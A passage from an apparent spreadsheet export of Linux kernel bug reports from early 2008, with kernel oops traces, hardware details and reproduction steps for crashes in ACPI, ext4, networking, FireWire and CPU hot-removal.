IDE Controller (rev 09) 01:00.0 PCI bridge: Intel Corporation 6702PXH PCI Express-to-PCI Bridge A (rev 09) 02:08.0 SCSI storage controller: LSI Logic / Symbios Logic SAS1068 PCI-X Fusion-MPT SAS (rev 01) 03:00.0 PCI bridge: Broadcom EPB PCI-Express to PCI-X Bridge (rev c2) 04:00.0 Ethernet controller: Broadcom Corporation NetXtreme II BCM5708 Gigabit Ethernet (rev 11) 05:00.0 PCI bridge: Intel Corporation 6311ESB/6321ESB PCI Express Upstream Port (rev 01) 05:00.3 PCI bridge: Intel Corporation 6311ESB/6321ESB PCI Express to PCI-X Bridge (rev 01) 06:00.0 PCI bridge: Intel Corporation 6311ESB/6321ESB PCI Express Downstream Port E1 (rev 01) 06:01.0 PCI bridge: Intel Corporation 6311ESB/6321ESB PCI Express Downstream Port E2 (rev 01) 07:00.0 PCI bridge: Broadcom EPB PCI-Express to PCI-X Bridge (rev c2) 08:00.0 Ethernet controller: Broadcom Corporation NetXtreme II BCM5708 Gigabit Ethernet (rev 11) 0b:00.0 PCI bridge: Intel Corporation 6702PXH PCI Express-to-PCI Bridge A (rev 09) 10:0d.0 VGA compatible controller: ATI Technologies Inc ES1000 (rev 02) visp-1 ~ # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 6 model name : Intel(R) Xeon(TM) CPU 3.20GHz stepping : 4 cpu MHz : 3192.259 cache size : 2048 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pebs bts sync_rdtsc pni monitor ds_cpl vmx cid cx16 xtpr lahf_lm bogomips : 6390.26 clflush size : 64 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 6 model name : Intel(R) Xeon(TM) CPU 3.20GHz stepping : 4 cpu MHz : 3192.259 cache size : 2048 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pebs bts sync_rdtsc pni monitor ds_cpl vmx cid cx16 xtpr lahf_lm bogomips : 6383.68 clflush size : 64 processor : 2 vendor_id : GenuineIntel cpu family : 15 model : 6 model name : Intel(R) Xeon(TM) CPU 3.20GHz stepping : 4 cpu MHz : 3192.259 cache size : 2048 KB physical id : 0 siblings : 4 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pebs bts sync_rdtsc pni monitor ds_cpl vmx cid cx16 xtpr lahf_lm bogomips : 6383.75 clflush size : 64 processor : 3 vendor_id : GenuineIntel cpu family : 15 model : 6 model name : Intel(R) Xeon(TM) CPU 3.20GHz stepping : 4 cpu MHz : 3192.259 cache size : 2048 KB physical id : 0 siblings : 4 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pebs bts sync_rdtsc pni monitor ds_cpl vmx cid cx16 xtpr lahf_lm bogomips : 6383.77 clflush size : 64 Two FB-DIMM 512MB Manufacturer: 0198808980C1 Serial Number: 982D0D6A Asset Tag: 000621 Part Number: KD7538-IFA-INTC0S another Manufacturer: 0198808980C1 Serial Number: 9C2EA25B Asset Tag: 000621 Part Number: KD7538-IFA-INTC0S Steps to reproduce: Very difficult to reproduce, it is happening randomly.</t>
  </si>
  <si>
    <t>Oops on boot from laptop mode writing to /proc/acpi/processor/CPU0/throttling</t>
  </si>
  <si>
    <t>2008-01-14 11:19 UTC</t>
  </si>
  <si>
    <t>Simon Huggins</t>
  </si>
  <si>
    <t>2008-01-24 12:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unsure. Later than 2.6.24-rc2 Earliest failing kernel version: 2.6.24-rc6 (possibly earlier) Distribution: Debian Hardware Environment: Toshiba Portege r500 Software Environment: Problem Description: When I boot laptop-mode fires up and tries to write to /proc/acpi/processor/CPU0/throttling which contains &lt;not supported&gt; I don't quite know what I've done to get it to contain &lt;not supported&gt; but anyway that'll be more fun to track down I'm sure. In any case, in this configuration I get this oops even if all I do is echo stuff &gt;/proc/acpi/processor/CPU0/throttling [ 32.378673] Unable to handle kernel NULL pointer dereference at 0000000000000 000 RIP: [ 32.378761] [&lt;0000000000000000&gt;] _stext+0x7fdf7000/0x1a [ 32.378965] PGD 37bb3067 PUD 37b2a067 PMD 0 [ 32.379182] Oops: 0010 [1] SMP [ 32.379350] CPU 0 [ 32.379466] Modules linked in: rfcomm l2cap bluetooth acpi_cpufreq cpufreq_st ats cpufreq_userspace cpufreq_powersave cpufreq_ondemand freq_table sg sr_mod cd rom loop arc4 ecb blkcipher snd_hda_intel snd_pcm_oss snd_pcm snd_mixer_oss snd_ seq_dummy pcmcia snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event iwl4965 snd_seq firmware_class sdhci snd_timer snd_seq_device mmc_core mac80211 yenta_s ocket rsrc_nonstatic pcmcia_core snd psmouse soundcore cfg80211 snd_page_alloc i ntel_agp battery ac button evdev usb_storage ext3 jbd mbcache dm_mirror dm_snaps hot dm_mod ehci_hcd uhci_hcd e1000 sd_mod thermal processor fan [ 32.382717] Pid: 3267, comm: laptop_mode Not tainted 2.6.24-rc7 #1 [ 32.382797] RIP: 0010:[&lt;0000000000000000&gt;] [&lt;0000000000000000&gt;] _stext+0x7fd f7000/0x1a [ 32.382948] RSP: 0018:ffff81007b84de80 EFLAGS: 00010296 [ 32.383027] RAX: 0000000000000000 RBX: ffff81007d8c7800 RCX: 0000000000000000 [ 32.383110] RDX: ffff8100826b9000 RSI: 0000000000000000 RDI: ffff81007d8c7800 [ 32.383193] RBP: fffffffffffffffb R08: 000000000000002d R09: 0000000000000000 [ 32.383276] R10: 740174016f017201 R11: ffffffff802d03ef R12: 0000000000000000 [ 32.383359] R13: 0000000000000003 R14: 0000000000000003 R15: 00000000005c5808 [ 32.383442] FS: 00002b6898b11dc0(0000) GS:ffffffff804cd000(0000) knlGS:0000000000000000 [ 32.383545] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 32.383625] CR2: 0000000000000000 CR3: 000000007ba46000 CR4: 00000000000006e0 [ 32.383707] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 32.383790] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 32.383873] Process laptop_mode (pid: 3267, threadinfo ffff81007b84c000, task ffff81007ba40040) [ 32.383977] Stack: ffffffff88003c3d 0000000000000003 ffff81007d8c7800 ffff81007b84df50 [ 32.384314] ffffffff88003e43 00000000000a312d ffff810000000000 ffff81007d897cc0 [ 32.384603] fffffffffffffffb ffff81007ba57540 ffffffff802b717d ffff81007ba57780 [ 32.384829] Call Trace: [ 32.384973] [&lt;ffffffff88003c3d&gt;] :processor:acpi_processor_set_throttling+0x37/0x52 [ 32.385083] [&lt;ffffffff88003e43&gt;] :processor:acpi_processor_write_throttling+0x61/0x74 [ 32.385191] [&lt;ffffffff802b717d&gt;] proc_reg_write+0x7e/0x99 [ 32.385273] [&lt;ffffffff8028205f&gt;] vfs_write+0xc6/0x14f [ 32.385354] [&lt;ffffffff802825ad&gt;] sys_write+0x45/0x6e [ 32.385435] [&lt;ffffffff8020beee&gt;] system_call+0x7e/0x83 [ 32.385517] [ 32.385585] [ 32.385585] Code: Bad RIP value. [ 32.385819] RIP [&lt;0000000000000000&gt;] _stext+0x7fdf7000/0x1a [ 32.385947] RSP &lt;ffff81007b84de80&gt; [ 32.386020] CR2: 0000000000000000 [ 32.386109] ---[ end trace 2ded1a5f4094ec80 ]---</t>
  </si>
  <si>
    <t>fs/hfs/btree.c: new NULL dereference</t>
  </si>
  <si>
    <t>2.6.24-rc7-git</t>
  </si>
  <si>
    <t>2008-01-14 13:17 UTC</t>
  </si>
  <si>
    <t>2008-01-18 08:39 UTC</t>
  </si>
  <si>
    <t>Subject : fs/hfs/btree.c: new NULL dereference Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/1/14/346</t>
  </si>
  <si>
    <t>conversion of denormal floats to double is wrong</t>
  </si>
  <si>
    <t>2.6.18, 2.6.24</t>
  </si>
  <si>
    <t>2008-01-15 00:43 UTC</t>
  </si>
  <si>
    <t>Paolo Bonzini</t>
  </si>
  <si>
    <t>2008-06-02 20:56 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: tested on 2.6.18, but should not work anywhere Distribution: Debian Hardware Environment: alphaev56, alphaev68 Software Environment: mathemu=y Problem Description: conversion from denormal float to double is wrong Steps to reproduce: Compile with -O0 -mieee or -O2 -mieee: #include &lt;stdio.h&gt; float x = 1.0; double y; int g(float z) { printf ("%g\n", z); } int main() { x *= (1.0f / 65536.0f); x *= (1.0f / 65536.0f); x *= (1.0f / 65536.0f); x *= (1.0f / 65536.0f); x *= (1.0f / 65536.0f); x *= (1.0f / 65536.0f); x *= (1.0f / 65536.0f); x *= (1.0f / 65536.0f); x *= (1.0f / 65536.0f); x *= (1.0f / 32.0f); g(x); y = x; g(y); } Correct value should be: 1.4013e-45 1.4013e-45 Actual value is: 2.65249e-315 2.65249e-315 or 2.65249e-315 0 The right value is 2-149, that is 1.4013e-45, but the alpha does not do it. The architecture handbook says "A trap handler can convert an S_ floating denormal value into the corresponding T_ floating finite value by adding 896 to the exponent and normalizing", but here 896 is not added (math-emu should, at least on older alphas where it is relevant) and I get a denormal double, 2.65249e-315. Actually both compiled programs are correct. You get a zero if the denormal is casted back to float (which makes a zero, because it is way off the range of a float); you get 2.65249e-315 if the compiler performs some copy propagation and sees through the conversion (because if it was not for the errata, the two values should indeed have been equal). The bug reproduces both on alphaev56 and on alphaev68 (where math-emu should not be relevant, or so I'm told), both with CONFIG_MATHEMU=y.</t>
  </si>
  <si>
    <t>crash in kmem_cache_init</t>
  </si>
  <si>
    <t>2008-01-15 13:02 UTC</t>
  </si>
  <si>
    <t>2008-01-26 16:04 UTC</t>
  </si>
  <si>
    <t>Subject : crash in kmem_cache_init Submitter : Olaf Hering &lt;olaf@aepfle.de&gt; Date : 2008-01-15 16:09 References : http://lkml.org/lkml/2008/1/15/180 Probably caused by: commit 04231b3002ac53f8a64a7bd142fde3fa4b6808c6 Author: Christoph Lameter &lt;clameter@sgi.com&gt; Date: Tue Oct 16 01:25:32 2007 -0700 Memoryless nodes: Slab support http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=04231b3002ac53f8a64a7bd142fde3fa4b6808c6</t>
  </si>
  <si>
    <t>sky2 patch in 2.6.24-rc7-git6 breaks POST - commit 84cd2dfb04d23a961c5f537baa243fa54d0987ac</t>
  </si>
  <si>
    <t>commit 84cd2dfb04d23a961c5f537baa243fa54d0987ac</t>
  </si>
  <si>
    <t>2008-01-15 13:11 UTC</t>
  </si>
  <si>
    <t>2008-01-19 04:51 UTC</t>
  </si>
  <si>
    <t>Subject : sky2 patch in 2.6.24-rc7-git6 breaks POST - commit 84cd2dfb04d23a961c5f537baa243fa54d0987ac Submitter : "Ioan Ionita" &lt;opslynx@gmail.com&gt; Date : 2008-01-15 12:01 References : http://lkml.org/lkml/2008/1/15/98 Handled-By : Stephen Hemminger &lt;stephen.hemminger@vyatta.com&gt;</t>
  </si>
  <si>
    <t>[REGRESSION] 2.6.24-rc7: e1000: Detected Tx Unit Hang</t>
  </si>
  <si>
    <t>2008-01-15 13:15 UTC</t>
  </si>
  <si>
    <t>2008-01-18 08:38 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] 2.6.24-rc7: e1000: Detected Tx Unit Hang Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2008-01-15 06:25 References : http://lkml.org/lkml/2008/1/15/4 Handled-By : David Miller &lt;davem@davemloft.net&gt; Patch : http://lkml.org/lkml/2008/1/15/9</t>
  </si>
  <si>
    <t>net_device refcnt bug when NFQUEUEing bridged packets</t>
  </si>
  <si>
    <t>2008-01-15 15:28 UTC</t>
  </si>
  <si>
    <t>Jan C. Nordholz</t>
  </si>
  <si>
    <t>2008-06-02 20:46 UTC</t>
  </si>
  <si>
    <t>The bug is probably around since the combination bridge+NFQUEUE is possible, and does not depend on distro or environment: Packets that are to be sent out over a bridge device are skb_clone()d in br_loop() before traversing the appropriate (FORWARD/OUTPUT) NF chain. The copies made by skb_clone() share their nf_bridge metadata with the original, which is no problem usually. If however one or more packets of a br_loop() run end up in a NFQUEUE, their shared nf_bridge metadata causes trouble when they are about to be reinjected: nf_reinject() decrements the net_device refcounts that were previously upped when queueing the packet in __nf_queue(), but as skb-&gt;nf_bridge-&gt;physoutdev points to the same device for all these packets, most (if not all) of them will affect the wrong refcnt. (I originally encountered the bug on a Xen host because the hypervisor refused to shutdown a virtual device with non-zero refcount... but it is perfectly reproducible with a standard kernel, too, although it was a bit more tedious to create a test scenario, involving a couple of UMLs.) I'd suggest to make a real copy of the nf_bridge member in br_loop() if CONFIG_BRIDGE_NETFILTER is defined, remedying the entanglement. I'd go ahead and create a patch, but I'm unsure as to where that logic should be implemented.</t>
  </si>
  <si>
    <t>b43 module falls over</t>
  </si>
  <si>
    <t>2008-01-15 18:07 UTC</t>
  </si>
  <si>
    <t>Patrick Ohearn</t>
  </si>
  <si>
    <t>2008-01-16 02:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none, first attempt at getting b43 to work Earliest failing kernel version: 2.6.24-rc7 Distribution: Gentoo Hardware Environment: x86, intel pentium-m Software Environment: Linux? Problem Description: b43 module falls over when networkmanager tries to initilize it or when I try to scan by hand with `iwlist scanning` Steps to reproduce: Try to use the b43 driver :) I used b43-fwcutter-010 to install the latest firmware listed on the page at http://www.linuxwireless.org/en/users/Drivers/b43#devicefirmware (Version 4 firmware)</t>
  </si>
  <si>
    <t>Firewire Card Not Detected by JuJu Stack.</t>
  </si>
  <si>
    <t>2008-01-15 19:18 UTC</t>
  </si>
  <si>
    <t>2008-02-09 09:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Hardware Environment: Dual Quad Xeon, PCI-Express TI: TSB82AA2 (0c00: 104c:8025 (rev 01)), Maxtor OneTouch III external drives Software Environment: Gentoo, up to date. Problem Description: JuJu Stack appears to detect my card, but does not configure/operate it.It gives this message: [ 112.508000] firewire_ohci: Added fw-ohci device 0000:0f:02.0, OHCI version 1.10 [ 113.004177] firewire_core: created new fw device fw0 (0 config rom retries, S800) [ 144.038242] firewire_core: giving up on config rom for node id ffc0 [ 144.142736] firewire_core: giving up on config rom for node id ffc1 Steps to reproduce: Boot w/ old stack blacklisted, after boot up disks not detected. Remove the JuJu modules, load ohci1394 and sbp2 - now devices are correctly detected. [ 112.508000] firewire_ohci: Added fw-ohci device 0000:0f:02.0, OHCI version 1.10 [ 112.838704] eth1: Broadcom NetXtreme II BCM5708 1000Base-T (B2) PCI-X 64-bit 133MHz found at mem f8000000, IRQ 16, node addr 0019b9ed7670 [ 112.840981] net eth1_rename: device_rename: sysfs_create_symlink failed (-17) [ 113.004177] firewire_core: created new fw device fw0 (0 config rom retries, S800) [ 113.672681] net eth1: device_rename: sysfs_create_symlink failed (-17) [ 113.672729] udev: renamed network interface eth0 to eth1 [ 113.692225] net eth0: device_rename: sysfs_create_symlink failed (-17) [ 113.692276] udev: renamed network interface eth1_rename to eth0 [ 114.322997] Filesystem "dm-5": Disabling barriers, not supported by the underlying device [ 114.706628] Filesystem "dm-3": Disabling barriers, not supported by the underlying device [ 114.720217] XFS mounting filesystem dm-3 [ 114.795866] Ending clean XFS mount for filesystem: dm-3 [ 114.897802] Adding 42877444k swap on /dev/evms/swap0. Priority:-1 extents:1 across:42877444k [ 120.920862] bnx2: eth0: using MSI [ 122.520834] bnx2: eth0 NIC Copper Link is Up, 100 Mbps full duplex [ 144.038242] firewire_core: giving up on config rom for node id ffc0 [ 144.142736] firewire_core: giving up on config rom for node id ffc1</t>
  </si>
  <si>
    <t>unsupported ACPI video device - Samsung R70</t>
  </si>
  <si>
    <t>2008-01-16 00:08 UTC</t>
  </si>
  <si>
    <t>Erwan Velu</t>
  </si>
  <si>
    <t>2008-06-23 13:45 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version:unknown Distribution: Mandriva 2008.1 Alpha 2 Hardware Environment: Samsung R70 (BIOS UE6) Software Environment: 64Bit Problem Description: When booting up my system, I can see this error in my dmesg. As requested on the linux-acpi mailing list, I'm opening that bug. Here come the dmesg : ACPI Error (utglobal-0126): Unknown exception code: 0xFFFFFFFE [20070126] Pid: 1952, comm: modprobe Not tainted 2.6.24-laptop-0.rc7.2mdv #1 Call Trace: [&lt;ffffffff8038bd2e&gt;] acpi_ut_update_ref_count+0x50/0x9d [&lt;ffffffff8038c1d9&gt;] acpi_format_exception+0x2c/0x35 [&lt;ffffffff8038af73&gt;] acpi_ut_exception+0x25/0x8c [&lt;ffffffff803765cc&gt;] acpi_evaluate_integer+0xb6/0xc7 [&lt;ffffffff881dcd0a&gt;] :video:acpi_video_bus_add+0xcc9/0xce2 [&lt;ffffffff802c46a8&gt;] ifind+0x58/0xd0 [&lt;ffffffff8038f2e8&gt;] acpi_device_probe+0x43/0x91 [&lt;ffffffff803c321c&gt;] driver_probe_device+0x9c/0x1b0 [&lt;ffffffff803c34e9&gt;] __driver_attach+0xc9/0xd0 [&lt;ffffffff803c3420&gt;] __driver_attach+0x0/0xd0 [&lt;ffffffff803c23fd&gt;] bus_for_each_dev+0x4d/0x80 [&lt;ffffffff803c286c&gt;] bus_add_driver+0xac/0x220 [&lt;ffffffff8814603c&gt;] :video:acpi_video_init+0x3c/0x5e [&lt;ffffffff8026236e&gt;] sys_init_module+0x18e/0x19a0 [&lt;ffffffff802522f0&gt;] autoremove_wake_function+0x0/0x30 [&lt;ffffffff8020c34e&gt;] system_call+0x7e/0x83 ACPI Exception (video-1721): UNKNOWN_STATUS_CODE, Cant attach device [20070126] Steps to reproduce: Just bootup on that system.</t>
  </si>
  <si>
    <t>radeonfb and Xpress 200m 5955</t>
  </si>
  <si>
    <t>&gt;=2.6.23</t>
  </si>
  <si>
    <t>2008-01-16 01:33 UTC</t>
  </si>
  <si>
    <t>Alex</t>
  </si>
  <si>
    <t>2008-01-18 08:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23 Earliest failing kernel version: any Distribution: gentoo Hardware Environment: Radeon XPress 200m 5955 Software Environment: Problem Description: framebuffer is ok only with default parameters only (it is 1280x800-8@60). If parameters are video=radeonfb:1280x800-32@60 then xres, yres and xres_virtual are ok but yres_virtual is 1024. It can be corrected by fbset utility so I think it can be corrected in the driver code also. Steps to reproduce: video=radeonfb:1280x800-32@60 or video=radeonfb:1280x800-16@60</t>
  </si>
  <si>
    <t>Ext4 Oops with corrupted filesystem</t>
  </si>
  <si>
    <t>2.6.24-rc8</t>
  </si>
  <si>
    <t>2008-01-16 11:15 UTC</t>
  </si>
  <si>
    <t>2008-01-17 06:30 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.24-rc8 Distribution: gentoo Problem Description: Mounting a corrupted ext4 image results in an oops [ 6631.223242] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000010 [ 6631.223334] printing eip: c02112a8 *pde = 00000000 [ 6631.223411] Oops: 0000 [#1] PREEMPT [ 6631.223469] Modules linked in: [ 6631.223574] [ 6631.223598] Pid: 4050, comm: mount Not tainted (2.6.24-rc8 #6) [ 6631.223623] EIP: 0060:[&lt;c02112a8&gt;] EFLAGS: 00010202 CPU: 0 [ 6631.223726] EIP is at ext4_fill_super+0xd78/0x1d00 [ 6631.223750] EAX: 00000010 EBX: cbb9cd20 ECX: cbb9cd20 EDX: 00000010 [ 6631.223774] ESI: 00006600 EDI: 00000000 EBP: cf2d0d84 ESP: cf2d0c88 [ 6631.223798] DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 [ 6631.223881] Process mount (pid: 4050, ti=cf2d0000 task=c602c000 task.ti=cf2d0000) [ 6631.223906] Stack: cf2d0d70 00000000 00000000 001c19bf 00000000 00000002 c0934680 fffff9fe [ 6631.224206] ffffffff 00000014 00002000 cbb9cd20 00000000 c602c000 00000000 cf2d0cdc [ 6631.224563] 00000000 00000000 ca0b0860 c59fb618 c864d400 c07c1e38 cf2d0d3c 00000001 [ 6631.224863] Call Trace: [ 6631.225619] [&lt;c0173d79&gt;] do_kern_mount+0x39/0xd0 [ 6631.225720] [&lt;c0188cf4&gt;] do_mount+0x454/0x610 [ 6631.225776] [&lt;c0188f1f&gt;] sys_mount+0x6f/0xb0 [ 6631.225877] [&lt;c0104282&gt;] sysenter_past_esp+0x5f/0xa5 [ 6631.225923] ======================= [ 6631.226002] Code: df 09 f0 89 c6 83 c6 ff 83 d7 ff 8b 8d 30 ff ff ff 31 d2 8b 45 94 f7 71 18 85 d2 75 19 8b 5d 90 8b 45 80 8b 53 30 c1 e0 85 4c ff ff ff e8 [ 6631.228129] EIP: [&lt;c02112a8&gt;] ext4_fill_super+0xd78/0x1d00 SS:ESP 0068:cf2d0c88 [ 6631.228317] ---[ end trace b12d24ea7d5d100a ]--- Steps to reproduce: Mount the attached image with mount -t ext4dev -o loop,extents ext4.87.img.bck /media/test results in the oops. Looks like the oops happens in ext4_check_descriptors() which gets inlined into ext4_fill_super(). .L640: .loc 1 1382 0 movl -208(%ebp), %ecx #, xorl %edx, %edx # tmp698 movl -108(%ebp), %eax # i.301, tmp699 divl 24(%ecx) # &lt;variable&gt;.s_desc_per_block testl %edx, %edx # tmp698 jne .L641 #, .loc 1 1383 0 movl -112(%ebp), %ebx # sbi, .LVL625: movl -128(%ebp), %eax # desc_block, tmp700 movl 48(%ebx), %edx # &lt;variable&gt;.s_group_desc, sall $2, %eax #, tmp700 addl %edx, %eax #, tmp700 movl (%eax), %eax #, D.28431 &lt;----------------- Oopes here movl 24(%eax), %eax # &lt;variable&gt;.b_data, incl -128(%ebp) # desc_block movl %eax, -124(%ebp) #, gdp .LVL626: .L641: .LBE910: .loc 1 1385 0 movl -124(%ebp), %edx # gdp, gdp movl -180(%ebp), %eax # sb, sb call ext4_block_bitmap # which correlates to static int ext4_check_descriptors (struct super_block * sb) { ... if ((i % EXT4_DESC_PER_BLOCK(sb)) == 0) gdp = (struct ext4_group_desc *) sbi-&gt;s_group_desc[desc_block++]-&gt;b_data;</t>
  </si>
  <si>
    <t>2.6.24-rc8 + patches:  CPU hot removal while CPU is online leaves system in bad state</t>
  </si>
  <si>
    <t>2.6.24-rc8 + patch for bug 2884</t>
  </si>
  <si>
    <t>2008-01-17 15:25 UTC</t>
  </si>
  <si>
    <t>Daniel Arai</t>
  </si>
  <si>
    <t>2008-07-16 15:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknown Earliest failing kernel version: Unknown Distribution: sles10 Hardware Environment: x86_64 Software Environment: Problem Description: I've applied the patches attached to bug 2884 in kernel bugzilla so that I can work around the deadlock that occurs when you write to the eject node for an ACPI object. The kernel doesn't properly handle the case of ejecting a CPU that is still online. Doing so leaves the CPU online. It still shows up in /proc/cpuinfo. And the /sys/devices/system/cpuX node still exists. But the kernel goes ahead and calls the ACPI eject method anyway, which means the hardware is free to be removed at that point. And it cleans up the /sys nodes for the ACPI tree, so it's not possible to request another ejection. This leads to system instability as things gradually hang as they attempt to interact with the CPU that has gone away. Writing to the "eject" node for an online CPU should probably result in the ejection request being ignored because the CPU is still online. The /sys/ tree node for the ACPI device should be left intact, so another ejection can be requested after the CPU has been taken offline. The write to the eject sys node should probably fail with an error, but that's optional. Alternatively, the kernel could automatically offline an online CPU before ejecting it. I think it's a matter of taste which behavior you prefer. acpi_processor_remove looks like it returns -EINVAL if the CPU is online (see acpi_processor_handle_eject), but I don't think this return value is ever looked at, so the eject request isn't ever stopped. At least as far as I can see. Steps to reproduce: echo 1 &gt; /sys/devices/LNXSYSTM:00/device:00/ACPI0007:01/eject while CPU is still online. Watch your shell hang. Wait a few minutes and watch the whole system hang.</t>
  </si>
  <si>
    <t>mount: can not restrict mode of iso9660 files</t>
  </si>
  <si>
    <t>2.6.17-1.2142_FC4, 2.6.22.5-31</t>
  </si>
  <si>
    <t>2008-01-18 08:52 UTC</t>
  </si>
  <si>
    <t>gin</t>
  </si>
  <si>
    <t>2008-06-02 17:59 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: `2.6.17-1.2142_FC4': fedora core 4 for x86_64; `2.6.22.5-31': opensuse 10.3 for i586. Hardware Environment: i586, x86_64 Software Environment: Problem Description: File system may contain data not to let any logged in user read. Wish to specify more restrictive mode of files in it - files of all types, including not only regular ones, but also directories, even root one of the file system. This certainly must occur on mount itself, not in subsequent `chmod' calls. There is at least one obvious reason to avoid explicit `chmod', just as many other uses of it: possible race condition between it and other process opening the file. When mounting read- only iso9660 file system, `mount' ignores `mode=0400' file system option, at least for directories. More precisely, mount -nv -t iso9660 -o ro,norock,mode=0400,uid=ID_OF_REGULAR_USER DEVICE DIR completes without error messages and leaves DIR mounted, but with mode `r-xr-xr-x'. DIR uid is as specified. Also ran that command in `strace -emount'. Its outputs: mount("DEVICE", "DIR", "iso9660", MS_RDONLY|MS_POSIXACL|MS_ACTIVE|MS_NOUSER|0xec0000, 0x50fe60) = 0 suggesting that data converted from `-o' argument are actually passed to the kernel. Permissions of regular files in mounted file system are `0400', that is, restricted properly. This suggests that the request to restrict permissions, or at least part of it, is passed to kernel. However, kernel does not honor the request wrt directories in mounted file system - or at best needs a separate request for permissions of directories, which `mount' program does not make. Steps to reproduce: mount -nv -t iso9660 -o ro,norock,mode=0400,uid=ID_OF_REGULAR_USER DEVICE DIR ls -ld DIR</t>
  </si>
  <si>
    <t>HOST_MSG_LOOP invalid SCB ff</t>
  </si>
  <si>
    <t>Through to 2.6.24-rc8  (X64)</t>
  </si>
  <si>
    <t>2008-01-18 13:34 UTC</t>
  </si>
  <si>
    <t>John Huttley</t>
  </si>
  <si>
    <t>2008-02-16 18:40 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Gentoo Hardware Environment: ML150G3, (2Core cpu, 64Bit) AHA3944AUWD card, Storagetek L80 +2x DLT8000 Software Environment: gentoo Problem Description: kernel panic Steps to reproduce: Panic if the L80 is powered up when the kernel boots. 100% on any failing kernel. Not all kernels fail but most do. Git Bisect across linus's tree did not produce a convincing patch. Originally filed here: http://bugs.gentoo.org/show_bug.cgi?id=200708 I have joined the linux-scsi list and will ..continue</t>
  </si>
  <si>
    <t>unregister_netdevice: waiting for [device] to become free</t>
  </si>
  <si>
    <t>2008-01-19 12:20 UTC</t>
  </si>
  <si>
    <t>Nigel Cunningham</t>
  </si>
  <si>
    <t>2008-01-31 09:42 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-rc7 Earliest failing kernel version: 2.6.24-rc8 Distribution: Ubuntu Gutsy Hardware Environment: AMD64, Atheros 5212 chipset Software Environment: Fairly recent madwifi svn. Problem Description: Patch "[PATCH][NEIGH] Fix race between neigh_parms_release and neightbl_fill_parms" (9cd40029423701c376391da59d2c6469672b4bed) causes the error described in the subject line to occur when seeking to unload a device. Also seen by some of my TuxOnIce users with e1000 and ppp42. Steps to reproduce: Run a kernel with the above patch, bring up a (nonloopback) interface, seek to take it down.</t>
  </si>
  <si>
    <t>Setting cpu_share to 1 freezes system</t>
  </si>
  <si>
    <t>2008-01-19 16:12 UTC</t>
  </si>
  <si>
    <t>Daniel Hahler</t>
  </si>
  <si>
    <t>2008-01-22 20:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Hardware Environment: amd64, x86 kernel Problem Description: The following command locks up my system: echo 1 | sudo tee /sys/kernel/uids/`id -u`/cpu_share While I have not reproduced it for this command, it locked up my system twice when trying it with the uid of my system user "boinc". Others on the IRC channel ##kernel could not confirm it (using virtual machines on 64bit and 32bit), but I think it's grave enough to report it anyway. I'm using the 2.6.24 kernel from Ubuntu (but someone on ##kernel could not confirm it using the ubuntu-server kernel). My CPU is AMD64 3000+. Please ask for any details you need to understand the problem. Steps to reproduce: echo 1 | sudo tee /sys/kernel/uids/`id -u`/cpu_share</t>
  </si>
  <si>
    <t>possible recursive locking detected - eventpoll</t>
  </si>
  <si>
    <t>2008-01-21 08:22 UTC</t>
  </si>
  <si>
